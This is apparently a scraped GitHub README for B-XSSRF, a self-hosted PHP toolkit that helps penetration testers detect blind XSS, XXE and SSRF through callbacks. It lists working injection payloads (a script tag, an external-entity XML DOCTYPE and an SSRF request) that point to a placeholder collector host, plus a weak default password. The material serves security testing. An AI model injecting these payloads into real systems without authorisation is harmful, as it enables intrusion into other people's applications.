SpiderMate/B-XSSRF: Toolkit to detect and keep track on Blind XSS, XXE & SSRF
2019-09-02 00:59:54 Author: github.com(查看原文) 阅读量:302 收藏

Join GitHub today

GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

Sign up

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

PHP TSQL

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

B-XSSRF

SETUP

  • Upload the files to your server.
  • Create a Database and upload database.sql file to it.
  • Change the DB Credentials in db.php file.
  • Ready.

USAGE

BLIND XSS

<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">

BLIND XXE

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>

SSRF

GET /testssrf.php=http://mysite.com/bxssrf/request.php

DEFAULT CREDENTIALS

USER : [email protected]
PASS : 123456

文章来源: https://github.com/SpiderMate/B-XSSRF
如有侵权请联系:admin#unsafe.sh